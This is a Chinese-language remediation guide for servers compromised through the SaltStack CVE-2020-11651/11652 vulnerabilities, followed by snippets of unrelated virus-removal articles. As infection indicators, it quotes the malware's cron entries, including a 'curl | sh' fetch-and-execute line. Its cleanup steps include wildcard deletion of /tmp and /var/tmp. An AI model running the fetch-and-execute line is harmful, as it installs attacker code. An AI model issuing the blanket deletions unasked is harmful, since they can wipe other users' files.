saltstack是基於python開發的一套c/s自動化運維工具。近日,saltstack被爆存在認證繞過漏洞(cve-2020-11651)和目錄遍歷漏洞(cve-2020-11652),其中:
cve-2020-11652:為目錄遍歷漏洞,攻擊者可構造惡意請求,讀取伺服器上任意檔案,獲取系統敏感資訊資訊。
漏洞影響版本
saltstack < 2019.2.4
saltstack < 3000.2
手工清理過程:
1. ssh到自己的主機,top指令檢視,如果有salt-minions之類的程序佔滿cpu,說明中招了,先解除安裝一下salt-minion
centos/redhat: yum remove salt-minion
ubuntu: apt remove salt-minion
2. 檢視定時任務
crontab -l
如果看到類似這樣
* * * * * curl | sh > /dev/null 2>&1
* * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
用 crontab -e 指令編輯定時任務
進入編輯器後,把上面兩行刪除然後儲存退出,刪除(按兩下d刪除游標行)和退出(按冒號,游標在最下面,輸入wq回車)可參考vim的基本用法
3. 把上面的檔案刪除
rm -f /usr/bin/salt-store
rm -f /tmp/salt-store
rm -f /var/tmp/salt-store
rm -f /tmp/*
rm -f /var/tmp/*
4. 殺幹壞事的程序
ps aux |grep salt-store
如果有值,則用
kill ***
殺掉,***就是程序id(第二列的那個數字)
同樣的道理,用
ps aux |grep salt-minions
檢視,並用kill殺
5. top 觀察一下,是否還有salt-minions,如果沒有就正常了
緊急 通過saltstack漏洞獲取root許可權
緊急 通過saltstack漏洞獲取root許可權 the more you know the more you know you don t know 近期開源的集群管理工具saltstack爆出cvss得分為10分的漏洞如果你對cvss的評分沒有概念,那麼前幾年震驚網際網路圈的openssl心臟...
手工清除隱藏的病毒和木馬
檢查登錄檔 登錄檔一直都是很多木馬和病毒 青睞 的寄生場所,注意在檢查登錄檔之前要先給登錄檔備份。1 檢查登錄檔中hkey local machine software microsoft windows currentversion run和hkey local machine software ...
Winlogon(落雪)病毒手工清除辦法
不知 命的名,叫落雪還是蠻有意思的。今天一台測試的機器中毒了,剛裝好的windows xp pro with sp2正版,剛剛上windows updated 打好了到8月份的安全補丁,office 2003安裝了sp2,防火牆開啟了,安裝了symantec antivirus 10,更新到最新的病...